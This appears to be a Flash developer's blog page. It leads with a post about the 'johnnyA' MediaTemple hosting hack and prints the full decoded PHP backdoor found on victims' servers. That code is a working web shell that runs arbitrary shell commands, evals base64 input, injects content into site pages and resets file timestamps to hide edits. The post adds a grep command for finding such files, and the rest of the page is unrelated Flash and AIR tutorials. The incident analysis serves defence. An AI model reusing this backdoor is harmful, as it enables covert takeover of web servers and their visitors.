The Flash Blog
Details of the johnnyA MediaTemple Hack
Update: MediaTemple directed me to another blog post with additional details. This highlights another problem with this incident. The information has been spread all over the place. While this blog post does give some good details, it still does not provide cleanup instructions. It simply says that all malicious files have been removed. I’m sorry to say that they have not.
If you have websites hosted on a MediaTemple (gs) then you may have been a victim of this annoying redirect hack, unofficially known as the johnnyA hack. It was once thought to be an issue with WordPress, but in reality static sites are also affected by this. Essentially the attack works by including some encoded JavaScript onto your pages that tries to redirect you to a malicious website or file.
After much searching and with the help of this blog post, I have found the rootkit that is used to do the damage. If you have been hacked you will find some PHP files that were created by the attackers with a bunch of gzipped, base64-encoded source code. I converted that into the actual attack code which is listed below:
12
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
<?PHP
@ignore_user_abort(1);
@set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
@error_reporting(0);
@ini_set("memory_limit","16M");
if (!function_exists('rand_checkstr'))
{
function rand_checkstr()
{
$c5 = 1;
$c3 = 8;
$e7 ="";
for ($f3=0;$f3<$c3;$f3++) {
$c4 = mt_rand(1,7);
switch ($c4) {
case ($c4<=2):
$e7 .= mt_rand(0,9);
break;
case ($c4<=4):
$e7 .= chr(mt_rand(65,90));
break;
case ($c4<=6):
$e7 .= chr(mt_rand(97,122));
break;
case 7:
$e6 = strlen($e7);
if ($c5>0&&$e6>0&&$e6<($c3-1)&&$e7[$e6-1]!="_")
{
$e7 .= "_";
$c5--;
}
else
{
$f3--;
continue;
}
break;
}
}
return $e7;
}
}
if (!function_exists('strrevpos'))
{
function strrevpos($f4, $f6)
{
$f5 = strpos (strrev($f4), strrev($f6));
if ($f5===false)
return false;
else
return strlen($f4) - $f5 - strlen($f6);
}
}
if (!function_exists('after'))
{
function after ($this, $d8)
{
if (!is_bool(strpos($d8, $this)))
return substr($d8, strpos($d8,$this)+strlen($this));
}
}
if (!function_exists('after_last'))
{
function after_last ($this, $d8)
{
if (!is_bool(strrevpos($d8, $this)))
return substr($d8, strrevpos($d8, $this)+strlen($this));
}
}
if (!function_exists('before'))
{
function before ($this, $d8)
{
return substr($d8, 0, strpos($d8, $this));
}
}
if (!function_exists('before_last'))
{
function before_last ($this, $d8)
{
return substr($d8, 0, strrevpos($d8, $this));
}
}
if (!function_exists('between'))
{
function between ($this, $f7, $d8)
{
return before($f7, after($this, $d8));
}
}
if (!function_exists('between_last'))
{
function between_last ($this, $f7, $d8)
{
return after_last($this, before_last($f7, $d8));
}
}
if (!function_exists('stripslashes2'))
{
function stripslashes2($d3)
{
$d3 = str_replace('\\\\\\"', '\\"', $d3);
$d3 = str_replace("\\\'", "'", $d3);
$d3 = str_replace("\\\\\\\\", "\\\\", $d3);
return $d3;
}
}
if (!function_exists('getfiles'))
{
function getfiles($d4, $f1, $d5=0, $f8="\\")
{
if(!is_dir($d4))
{
return null;
}
$d9=($f8=="\\")?"/":$f8;
$d4=str_replace($f8,$d9,$d4);
$d4=str_replace("//",$d9,$d4);
$d4=(strrpos($d4, $d9)==strlen($d4)-1)? substr($d4, 0, strlen($d4)-1):$d4;
$e0=substr_count($d4, $d9);
$d5=(!$d5)?-1:$d5+$e0;
$e8=array();
$d7=array( array($d4, $e0) );
while(sizeof($d7) && $d7[0][1]!=$d5)
{
$d6=array_shift($d7);
$f9=opendir($d6[0]);
while( ($f0=readdir($f9))!==false )
{
if( strrpos($f0,".") === (strlen($f0)-1))
{
continue;
};
$f2=$d6[0].$d9.$f0;
if(is_dir($f2))
{
$e9[]=$f2;
$d7[]=array( $f2, substr_count($f2, $d9) );
}
else
{
foreach($f1 as $f3)
{
if(preg_match($f3,$f2))
{
$e8[]=$f2;break;};
}
};
};
}
return $e8;
}
}
if (!function_exists('checkcontent2'))
{
function checkcontent2($g0)
{
$e5 = array("Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)",
"Mozilla/5.0 (compatible; SnapPreviewBot; en-US; rv:1.8.0.9) Gecko/20061206 Firefox/1.5.0.9",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9b5) Gecko/2008032619 Firefox/3.0b5",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.5) Gecko/20060731 Firefox/1.5.0.5 Flock/0.7.4.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008092215 Firefox/3.0.1 Orca/1.1 beta 3",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.xx) Gecko/20030504 Mozilla Firebird/0.6",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5");
if (function_exists('curl_init'))
{
$g2 = $e5[rand(0,count($e5)-1)];
$g1 = curl_init();
curl_setopt($g1, CURLOPT_URL, $g0);
curl_setopt($g1, CURLOPT_HEADER, 0);
curl_setopt($g1, CURLOPT_TIMEOUT, 30);
curl_setopt($g1, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($g1, CURLOPT_USERAGENT, $g2);
curl_setopt($g1, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($g1, CURLOPT_MAXREDIRS, 2);
$g3 = curl_exec($g1);
curl_close($g1);
if ($g3 !== false)
{
return $g3;
}
}
else if (ini_get('allow_url_fopen') == '1')
{
$g3 = file_get_contents($g0);
if ($g3 !== false)
{
return $g3;
}
}
else
{
echo "<h5 style='color:maroon'>Can't download ".$g0." - EXIT;</h5>";
exit;
}
}
}
if (!function_exists('getcode'))
{
function getcode($g4,$d0)
{
$c8 = '';
if(preg_match("/$d0/",$g4))
{
$c8 = preg_replace("/.*<b1><!--|$d0|--><\/b1>.*/msi","",$g4);
}
return $c8;
}
}
$d1 = array("(\.ph.*$|\.htm.*$|\.shtm.*$|\.asp.*$|\.jsp$|\.jhtm$|\.cfm$|\.ctp$|\.tpl$)");
$a7 = array("/<ad>.*<\/ad>/si",
"/<ads>.*<\/ads>/si",
"/<bb1>.*<bb2>/si",
"/<b1>.*<\/b1>/si",
"/<bb1><bb1>/si",
"/<bb2><bb2>/si",
"/<(span|font|div) style=.*(height|width)\s*:\s*[0-2]{1}\s*(pt|px).*(overflow|visibility)\s*:\s*(auto|hidden).*>.*<a href=.*<\/a>.*<\/(span|font|div)>/Usi",
"/<(span|font|div) style=.*(overflow|visibility)\s*:\s*(auto|hidden).*(height|width)\s*:\s*[0-2]{1}\s*(pt|px).*>.*<a href=.*<\/a>.*<\/(span|font|div)>/Usi",
"/<(span|font|div) style=.*visibility\s*:\s*(auto|hidden).*overflow\s*:\s*(auto|hidden).*>.*<a href=.*<\/a>.*<\/(span|font|div)>/Usi",
"/<(span|font|div) style=.*overflow\s*:\s*(auto|hidden).*visibility\s*:\s*(auto|hidden).*>.*<a href=.*<\/a>.*<\/(span|font|div)>/Usi", "/wpfooterz.*wpfooterz/si", "/<a.*style\s*=.*(top|left)\s*:\s*-[0-9]{3,5}.*>.*<\/a>/Ui",
"/<a.*(viagra|cialis|phentermine|vioxx|hydrocodon|oxycontin|levitra|ambien|xanax|adipex|cheap pills|paxil|Codeine|vicodin|tramadol|tadalafil|carisoprodol|mesothelioma|lorazepam|propecia|protonix|prozac|prescription|buy cheap|zithromax)+.*><\/a>/i");
if (isset($_REQUEST['update1']))
{
$b4 = explode("EXPC",gzinflate(base64_decode($_REQUEST['update1'])));
$b0 = $b4[0];
$b5 = explode(',',$b4[1]);
foreach($b5 as $a3)
{
if (strlen($b0) > 1)
$b0 = "<ads>".$b0."</ads>";
$a2 = false;
$a5 = false;
if (!is_writable($a3))
@chmod($a3, 0644);
if (file_exists($a3) && is_writable($a3))
{
$b7 = false;
if (eregi(".htm",$a3) !== false || eregi(".shtm",$a3) !== false)
$b7 = true;
$a1 = trim(file_get_contents($a3));
foreach($a7 as $c2)
{
if (preg_match($c2, $a1))
{
$a1 = preg_replace($c2, "", $a1);
$a5 = true;
}
}
if (preg_match("/<body(.*)?>/i",$a1,$a9))
{
$a0=$a9[0];
$a1=preg_replace("/<body(.*)?>/i", $a0.$b0, $a1);
$a2 = true;
}
else if (preg_match("/<\/body(.*)?>/i",$a1,$a9))
{
$a0=$a9[0];
$a1=preg_replace("/<\/body(.*)?>/i", $b0.$a0, $a1);
$a2 = true;
}
else if (preg_match("/<\/html>/i",$a1,$a9))
{
$a0="</body>".$a9[0];
$a1=preg_replace("/<\/html>/i", $b0.$a0, $a1);
$a2 = true;
}
else if ($b7 == true)
{
$a0=$b0."</body></html>";
$a1.=$a0;
$a2 = true;
}
if ($a2 == true || $a5 == true)
{
$a4 = @filemtime($a3);
$b1 = fopen($a3, "w+");
fwrite($b1, $a1);
fclose($b1);
@touch($a3,$a4,$a4);
if ($a2 == true)
echo "<pre>update $a3</pre>";
if ($a5 == true)
echo "<pre>spam removed $a3</pre>";
}
}
else
{
if (!file_exists($a3))
echo "<pre>no file $a3</pre>";
else if (!is_writable($a3))
echo "<pre>no rw file $a3</pre>";
}
}
}
if (isset($_REQUEST['update2']))
{
$b0 = gzinflate(base64_decode($_REQUEST['update2']));
$a6 = $_SERVER['SCRIPT_FILENAME'];
$b6 = before_last('/',$a6);
if (!is_writable($b6))
@chmod($b6, 0644);
$b8 = @filemtime($b6);
@copy($a6,$a6.'1.php');
@touch($b6,$b8,$b8);
@touch($a6.'1.php',$b8,$b8);
if (!is_writable($a6))
@chmod($a6, 0644);
if (is_writable($a6))
{
$a1 = trim(file_get_contents($a6));
$b3 = preg_replace('/^\<\?php.*\?\>/Usi','',$a1);
$a4 = @filemtime($a6);
$b1 = fopen($a6, "w");
fwrite($b1, $b0.$b3);
fclose($b1);
@touch($a6,$a4,$a4);
echo "<pre>update</pre>";
}
else
{
echo "<pre>no rw $a3</pre>";
}
}
if (isset($_REQUEST['update3']))
{
echo "<pre>";
$a8 = $_REQUEST['update3'];
$b4 = '';
if (!empty($a8))
{
if(function_exists('exec'))
{
@exec($a8,$b4);
$b4 = join("\n",$b4);
}
elseif(function_exists('shell_exec'))
{
$b4 = @shell_exec($a8);
}
elseif(function_exists('system'))
{
@ob_start();
@system($a8);
$b4 = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($a8);
$b4 = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($b2 = @popen($a8,"r")))
{
$b4 = "";
while(!@feof($b2))
{
$b4 .= @fread($b2,1024);
}
@pclose($b2);
}
}
echo $b4;
echo "</pre>";
}
if (isset($_REQUEST['add1']))
{
$b4 = explode("EXPC",gzinflate(base64_decode($_REQUEST['add1'])));
$b0 = $b4[0]; $b5 = explode(',',$b4[1]);
foreach($b5 as $a3)
{
$a2 = false;
$a5 = false;
if (!is_writable($a3))
@chmod($a3, 0644);
if (file_exists($a3) && is_writable($a3))
{
$a1 = trim(file_get_contents($a3));
$a1 = preg_replace("/var\sst1(.*)gr0\=0\;/i", "", $a1);
$a1=$b0.$a1;
$a4 = @filemtime($a3);
$b1 = fopen($a3, "w");
fwrite($b1, $a1);
fclose($b1);
@touch($a3,$a4,$a4);
echo "<pre>update $a3</pre>";
}
else
{
if (!file_exists($a3))
echo "<pre>no file $a3</pre>";
else if (!is_writable($a3))
echo "<pre>no w file $a3</pre>";
}
}
}
if (isset($_REQUEST["ev1"]))
{
$b9=base64_decode($_REQUEST["ev1"]);
if (isset($_REQUEST["s"]))
{
$b9=stripslashes2($b9);
};
eval($b9);
exit();
}
if (isset($_REQUEST["info1"]))
{
$c0 = 'dGVzdDEyNw==';
$c1 = @get_current_user();
echo "<!--".base64_decode($c0)."(($c1))-->";
exit;
}
if (isset($_REQUEST["get1"]))
{
get_magic_quotes_gpc() ? $c6 = stripslashes($_REQUEST['get1']) : $c6 = $_REQUEST['get1'];
$d2 = before($_SERVER['PHP_SELF'],$_SERVER['SCRIPT_FILENAME']);
$d0 = rand_checkstr();
$e1 = array("((^index.*\.|^default.*\.|^main.*\.|^.*body.*\.|^login.*\.|^.*content.*\.|^auth.*\.|^.*footer.*\.|^home.*\.|^.*templ.*\.|^inc.*\.|^page.*\.|^hyperseek.*\.|^Output.*\.|^comment.*\.|^uifunctions.*\.|^bottom.*\.|^infocus.*\.)(ph.*$|htm.*$|shtm.*$|asp.*$|jsp$|jhtml$|cfm$|tpl$|inc$|pl$|templ.*$|xml$|sht$|ctp$))");
$b5 = getfiles($d2, $e1, 4);
foreach($b5 as $a3)
{
$a2 = false;
$a5 = false;
if (file_exists($a3))
{
if (!is_writable($a3))
@chmod($a3, 0644);
if (is_writable($a3))
{
$e2 = base64_encode(gzcompress($a3,9));
$b0 ="<b1><!--".$d0.$e2."--></b1>";
$a1 = trim(file_get_contents($a3));
foreach($a7 as $c2)
{
if (preg_match($c2, $a1))
{
$a1 = preg_replace($c2, "", $a1);
$a5 = true;
}
}
if (preg_match("/<body(.*)?>/i",$a1,$a9))
{
$a0=$a9[0];
$a1=preg_replace("/<body(.*)?>/i", $a0.$b0, $a1);
$a2 = true;
}
else if (preg_match("/<\/body(.*)?>/i",$a1,$a9))
{
$a0=$a9[0];
$a1=preg_replace("/<\/body(.*)?>/i", $b0.$a0, $a1);
$a2 = true;
}
else if (preg_match("/<\/html>/i",$a1,$a9))
{
$a0="</body>".$a9[0];
$a1=preg_replace("/<\/html>/i", $b0.$a0, $a1);
$a2 = true;
}
if ($a2 == true || $a5 == true)
{
$a4 = @filemtime($a3);
$b1 = @fopen($a3, "w+");
@fwrite($b1, $a1);
@fclose($b1);
@touch($a3,$a4,$a4);
}
}
}
}
$c9 = checkcontent2($c6);
if (eregi($d0, $c9))
{
$c9 = gzuncompress(base64_decode(getcode($c9,$d0)));
echo $c9;
}
foreach($b5 as $a3)
{
$a5 = false;
if (file_exists($a3))
{
if (!is_writable($a3))
@chmod($a3, 0644);
if (is_writable($a3))
{
$a1 = trim(file_get_contents($a3));
foreach($a7 as $c2)
{
if (preg_match($c2, $a1))
{
$a1 = preg_replace($c2, "", $a1);
$a5 = true;
}
}
if ($a5 == true)
{
$a4 = @filemtime($a3);
$b1 = @fopen($a3, "w+");
@fwrite($b1, $a1);
@fclose($b1);
@touch($a3,$a4,$a4);
}
}
}
}
exit;
}
if (isset($_REQUEST["get2"]))
{
$e3 = array();
get_magic_quotes_gpc() ? $c6 = stripslashes($_REQUEST['get2']) : $c6 = $_REQUEST['get2'];
$d2 = before($_SERVER['PHP_SELF'],$_SERVER['SCRIPT_FILENAME']);
$c7 = checkcontent2($c6);
$c6 = preg_replace("/^www\./i", "", $c6);
preg_match_all("/script.*src\s?=\s?(\"|')(.*\.js)(\?|\/|\"|')/Ui", $c7,$c8);
foreach ($c8[2] as $e4)
{
if (preg_match('/^http/i',$e4))
{
if (preg_match("/$c6/i",$e4))
{
$b2 = $d2.after($c6,$e4);
if (file_exists($b2))
$e3[] = $b2;
}
}
else
{
$b2 = $d2.'/'.$e4;
if (file_exists($b2))
$e3[] = $b2;
}
}
echo ($e3[rand(0,count($e3)-1)]);
exit;
}
?>
It looks like the attackers simply visit this PHP page and pass in some request parameters to tailor the attack. It looks like there are a few different options such as generating files, executing shell code, etc. I’m no PHP wizard so let me know if you find something interesting.
So how do you find these PHP files? Just SSH into your root directory and run:
1grep -iR --include "*.php" "[a-zA-Z0-9\/\+]\{255,\}" *
This will list all files that have a string that is longer than 255 characters. This should help you locate these files.
My big question is for MediaTemple. What the hell are you guys doing? Why are we having to dig around for this information? Surely you have determined the same things so why are you not telling people how to clean it up? This official blog post from MediaTemple is vague and tells us nothing about how to actually clean our servers up. Do your job!
New Tutorial on Flash to HTML5 Video Fallback
I just uploaded a new tutorial that shows you how to provide an HTML5 video fallback option for devices that do not support the Flash Player. The tutorial also shows you how to use the new Flash Media Playback component for quickly adding video to your websites. If getting your video out to the largest number of people is your goal, providing an HTML5 fallback is an absolute necessity.
New Video Tutorial on Mobile Web Development
I just uploaded a new tutorial that shows you how to create a mobile-optimized website using HTML and CSS. The tutorial also highlights the new multi-screen development features of Dreamweaver CS5. It is important to have a strong grasp on standard web technologies as only then can you make an informed decision about when to use Flash.
New Two-Part Tutorial On AIR 2.0 NativeProcess
I recently uploaded a two-part tutorial that explains how to use the new NativeProcess API in Adobe AIR 2.0. With this API you can communicate with native code to get deeper access to the host operating system. In the first part, I create a command-line screenshot application using Visual Studio and C#. In part two, I create an AIR-based front-end for the C# application using the NativeProcess API.
Event Handler Style Showdown
There has been some talk on Twitter recently about the best way to write an event handler. This is all in good fun of course as there is no right way to do any kind of code. Flashers come from all walks of life. Some are from the design world and some from serious development backgrounds. Below are some of the suggested ways. What do you think?
12
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
private function kermanStyle(evt:Event):void {
// this is nice but I don't like evt for some
// reason. Also it is much more readable and
// clean to put the opening { on a new line.
}
private function sacksStyle(event:Event):void
{
// Steven rightly puts the opening { on a new
// line but uses the word event for his event
// object. You should never use a lowercase
// version of an existing class for an instance.
}
private function brimelowStyle(e:Event):void
{
// Yeah baby that's what I'm talking about!
// Using e is short, succinct, and most of all
// it is the sign of high intelligence.
}
New Video Tutorial on Android Camera Access
Amazing Speaker Lineup at FITC San Francisco
I’ll Be Appearing on CNET Live Tomorrow
Tomorrow I will be appearing on the Android Atlas show on CNET Live. The topic will of course be Flash Player on Android. You can go and submit questions over on the CNET website. Ask about anything and everything related to Flash on Android.
On a related note, I found this nice video today from the Android and Me website showing off various Flash sites using a Nexus One. It’s nice to see an Android community video showing off the power of Flash on mobile.
Flash Community Believe Video
In addition to being one of the pioneers of MMA, clothing company Tapout is also amazing at creating commercials. Below is a Flash version of the commercials that are currently running on Spike TV.
Now there are many community members not represented here but choices had to be made. It came down to who had cool photos of themselves on Flickr. If you don’t you should hang around with John Davey and Ralph Hauwert more often.
Photos from ArulPrasad, Alan_Ross, johnnybelmont, unitzeroone, chrisorwig, mike.chambers. I know I missed some so please let me know in the comments and I will add you.
Introducing the MultiDraggable Touch API
Updates: I changed the name of the post as technically this is not a gesture API. It is a way to achieve gesture-like effects using touch data. Also the code below was missing an important line. You have to set the input mode to touch point in order for any of this to work.
As part of my multi-touch session at Flashbelt I introduced a new API for getting true multi-touch gestures in Flash. Windows 7 has a pretty big limitation when it comes to gestures as it is only capable of doing one at a time. Since Flash listens for these native events, we also get that limitation when doing multi-touch in Flash.
Tim Kukulski, who is a member of the Adobe XD team, has written a great set of classes that listens for raw touch events instead of the built-in gestures. The main class, called MultiDraggable, does all of the work for you and allows you to quickly add zoom, rotate, and drag gesture effects to any DisplayObject. See the video below for an example.
The code needed to implement the gesture effects is extremely simple. Below is a code snippet of how to do it. You simply add your DisplayObject to the display list of a MultiDraggable instance. Then add the MultiDraggable instance to the main display list.
12
3
4
5
6
7
8
9
10
import xd.parts.MultiDraggable;
Multitouch.inputMode = MultitouchInputMode.TOUCH_POINT;
// box is a MovieClip in the library
var b:MovieClip = new box();
var dragme:MultiDraggable = new MultiDraggable();
dragme.addChild(b);
addChild(dragme);
Big thanks to Tim for releasing this code. Photos and artwork in the video are from Ralph and Mario. Go ahead and download the files and have fun spawning multiple gestures!
Introducing Strobe Media Playback
Update: Just noticed that the player is still in prerelease, so let the team know if you find issues.
As part of the Open Source Media Framework, Adobe has released a new video player called the Strobe Media Playback component. This is a full-featured video player that is ready for easy deployment. It has all of the advanced features of OSMF built right in including things like HTTP streaming, content protection, and progressive, streaming, and live video delivery. Obviously many of you will want to create a custom video player, but for quick video deployment, this player will be the way to go. I have recently switched to using this player on gotoAndLearn().
Deploying the player is very easy and all the instructions are included in the download files. Here’s a tip though. Take the height of your source video and add 35 to get the height of the SWF when you embed.
Thoughts On Apple’s HTML5 Demos
I had heard through the grapevine that Apple would be posting a set of HTML5 demos today. To be honest I was kind of looking forward to seeing some cool stuff. Instead they have presented a set of basic demos that have very little to do with HTML5 or web standards. On top of that they have implemented a browser-detection scheme that is quite deceptive to say the least.
The image below was circulated on Twitter and it shows that on Apple’s demo page you are unable to view the examples using Google Chrome, Opera, Firefox or any other browser and are instead asked to download and install Safari in order to see the demos. That is quite odd seeing as though Chrome has much better support for the future HTML5 standard according to the site html5test.com.
In an ironic and funny side note, the browser sniffing was apparently blocking people from viewing the demos on their iPhone, although I can’t confirm that. The performance of the demos on the iPhone may have something to do with that, as most of the demos crawled on my 3GS.
If you go to the developer section of Apple’s website you can view the demos using Chrome and are not directed to download Safari. So on to the demos themselves. I made a joke on Twitter about how these were equivalent to things created in Flash 8, but to be honest that is being kind. A photo slideshow and 360° PNG sequence are more like Flash 5. The reality is that HTML5 is capable of much more than that so it is odd that they considered these to be a good showcase of what is possible. Apple should really consider hiring some Flash developers to create some badass HTML5 demos. Many in the community have been dabbling in it and have created much more impressive demos than these.
Other browser manufacturers have rightfully jumped up to dispute Apple’s questionable browser-sniffing policy. Opera’s Haavard Moen blogged that
“when the page doesn’t work in Opera or other browsers it isn’t because these browsers don’t support HTML5. It’s because Apple uses browser sniffing and vendor prefixes, and in addition to that they aren’t really testing a lot of HTML5 at all. Most of their demos seem to have got nothing to do with HTML5, as a matter of fact.”
Christopher Blizzard from Firefox was more direct saying
“Apple’s messaging is clearly meant to say ‘hey, we love the web’ but the actual demos they have and the fact that actively block other browsers from those demos don’t match their messaging. It’s not intellectually honest at all.”
A quick review of the source code shows that it is littered with WebKit-specific prefixes and extensions. The messaging surrounding the demos is also iffy at best. In the Light Table demo, which is actually pretty nice, the messaging states that
“Using CSS3 transforms and transitions, photos can be easily sorted, shuffled, or displayed in a slideshow with just a few lines of CSS and JavaScript.”
Of course I was curious as to the contents of those 3 lines as they must be the most powerful 3 lines of code ever written. In actual fact, the JavaScript file that drives the demo is 700 lines long.
Personally I look forward to the day when simple things like video playback and photo galleries can be handed off to browsers to handle. Flash has always been about pushing the envelope. So long as there are standards, there will always be technologies and developers who want to go beyond that.
Multi-Touch Water Simulation Example
Microsoft Surface has a cool simulation that allows you to drag your fingers across the table to create a water simulation. That got me to thinking about doing it in Flash. Thanks to David Lenaerts’ excellent Ripple class, it took me about 10 minutes to create the example below.
As you can see the performance is very nice. The code that I used to create this is below. Again, all of the cool stuff comes from David’s code.
12
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import be.nascom.flash.graphics.Rippler;
import flash.events.TouchEvent;
import flash.ui.Multitouch;
import flash.ui.MultitouchInputMode;
Multitouch.inputMode = MultitouchInputMode.TOUCH_POINT;
stage.scaleMode = StageScaleMode.NO_SCALE;
stage.align = StageAlign.TOP_LEFT;
var t:Bitmap;
var r:Rippler;
t = new Bitmap(new bmap());
addChild(t);
r = new Rippler(t, 60, 6);
stage.addEventListener(TouchEvent.TOUCH_MOVE, handleMouseMove);
function handleMouseMove(e:TouchEvent):void
{
r.drawRipple(e.stageX, e.stageY, 20, 1);
}
New Video Tutorial on AIR for Android (Part 1)
Lee
New Video Tutorial On Multi-Touch In Flash
Lee
Adobe at Google I/O – An Unofficial Recap
For being only two days in length, Google I/O certainly packed a punch this year. There were lots of announcements and Adobe was at the center of many of them. Through some creative badge sharing, I was lucky enough to attend this year. Here are the some of the things that were announced that are of interest to Flashers.
HTML 5 Extension for Dreamweaver CS5
If you cut through the FUD machine you know that Adobe supports HTML 5 and sees it as a vital piece of the web, alongside Flash. To that end, Adobe has released a free extension to Dreamweaver CS5 that has some great features if you are working with HTML 5 or mobile devices. At the most basic level, the extension provides the necessary code hinting and completion for HTML 5 and CSS 3. The nicest feature is the new Multiscreen Preview Panel. This allows you to see how your page will be rendered on a phone, a tablet, and the web at the same time. It also allows you to include CSS logic to change the layout based on the target device. Awesome stuff!
Google Open Sources VP8 and Adobe Adds Flash Player Support
One of the major arguments surrounding HTML 5 deals with choosing the best codec to support. Google announced that it would be open sourcing the VP8 video codec. At the same time we announced that we would support VP8 playback in Flash Player along with H.264 and VP6. For me the big takeaway from this is, Adobe has you covered no matter what format you choose. I’ll leave it to the browsers to battle on which one is best. We have no time frame for rolling VP8 support in Flash Player, but if you came by the Adobe sandbox you saw that we already have it working.
Adobe Releases Flash Player 10.1 for Android (kinda)
I only say kinda because you have to have Android 2.2 (Froyo) in order to run it. The trouble is that the vast majority of folks don’t have early access to Froyo. Once you have Froyo you will be able to download the beta 1 version of 10.1 through the Android marketplace. You can read the details here.
Adobe Announces AIR for Android Public Beta
Our private beta for AIR has been rocking and I’m excited that we are now entering the public beta phase. All you have to do is go on over to the Adobe Labs site and sign an NDA. After that you will automatically be added to the beta program. Unlike 10.1, AIR will run on Eclair and does not require Froyo. Have fun with it!
AIR for Android Flash CS5 Extension
The process of building AIR applications has been made very easy thanks to a new extension for Flash CS5. You get access to this at the same time you get the AIR runtime that I talked about in the last paragraph. This extension allows you to create a new project for Android and, if your device is connected, you can publish right to the device and even debug on the device. No command line needed at all!
Google TV with AIR and Flash
Another big announcement for Google was their new set-top box allowing you to do web stuff on your TV. It is actually much more involved than the way I’m describing it. It will also allow you to run Android apps (including AIR) on your TV. The browser includes Flash Player 10.1 so you can browse to all your favorite video sites on your TV. Get your head out of gutter, I don’t mean those kinds of sites. Here is a cool video showing off Google TV.
HTC Evo-4G For All
Google handed out the brand new HTC Evo-4G to every attendee and this phone is badass! It has the largest screen of any smartphone and is a real powerhouse. Below are some random shots I took from the HTC UI. Expect some examples of AIR running on this badboy. Did I mention it has HDMI out?
These are exciting times to be a Flash developer!
Lee
Flash Works On Touch-Based Devices (Video)
Several people have been making assertions that most Flash sites will not work properly on touch-based devices because these sites use rollovers or hovers for things like effects and navigation. Well I put together this little video together showing that Flash sites do indeed work the way you would expect since the Flash Player dispatches rollover events even on a touch screen.
This video is aimed at clearing up the misinformation surrounding Flash rollover events and touch devices. The assertion that most Flash sites need to be rewritten is absolutely false. But please grab a tablet and see for yourself. I tried every FWA Site of the Month and they all worked fine.
Lee
Watch My Sessions From Flash Camp SF
Advanced Text Layout With Flash CS5
I give an introduction to some of the new Text Layout features and functionality in Flash CS5.
Introduction to Multi-Touch in Flash Player 10.1
Flash Player 10.1 introduces a full, native multi-touch API that allows you to create some amazing applications. In this session I demonstrate how to build applications using native multi-touch feedback as well as how to use the built-in gesture support for things like scaling and rotating.
Lee
Increasing The Code Hint Cache Size In Flash CS5
Update: my instructions for Mac got truncated but it is fixed now. Thanks to Kevin Suttle for pointing it out.
You may have read my earlier post about needing to not have too many files in your ActionScript source path in Flash CS5. After a certain number of files is reached, Flash will basically abort. This is to prevent Flash from indexing your entire hard drive if you happen to save your file in the top level of your disk (i.e c:\). Now the limit is actually 800 files by default, but as hardcore Flashers know, sometimes your global AS directory can be much larger. Well luckily there is a way to change this limit.
WARNING: do not change this if you are uncomfortable with editing your registry. Also do not change this and then complain that Flash is running slow when you save your FLA into your root directory of your hard drive.
Windows:
- Open Regedit and navigate to: HKEY_CURRENT_USER > Software > Adobe > Flash 11 > Settings
- Right+click and choose: ‘New… > DWORD Value’
- Rename the key: Project File Cap
- Select the key and choose: ‘Modify’
- Edit the value as either hex or decimal: 1000
- Click OK and restart Flash
Mac:
- Open /Users/<username>/Library/Preferences/Flash CS5 Preferences in Text Edit
- Under the <settings> section add the following: <project_file_cap>1000</project_file_cap>
- Save the file and restart Flash
What should you set it at? Well if you are good about saving your FLA files into their own folders, then it doesn’t really matter. I would try 5000 and see if that works. You can always change it back. Adobe is working on an official TechNote about this too.
Lee
The XFL File Format Explained
One of the most underrated features of Flash CS5 is the new XFL file format. But there is some confusion out there about what it is and how to use it. This quick post will hopefully clear some of these things up.
The XFL format
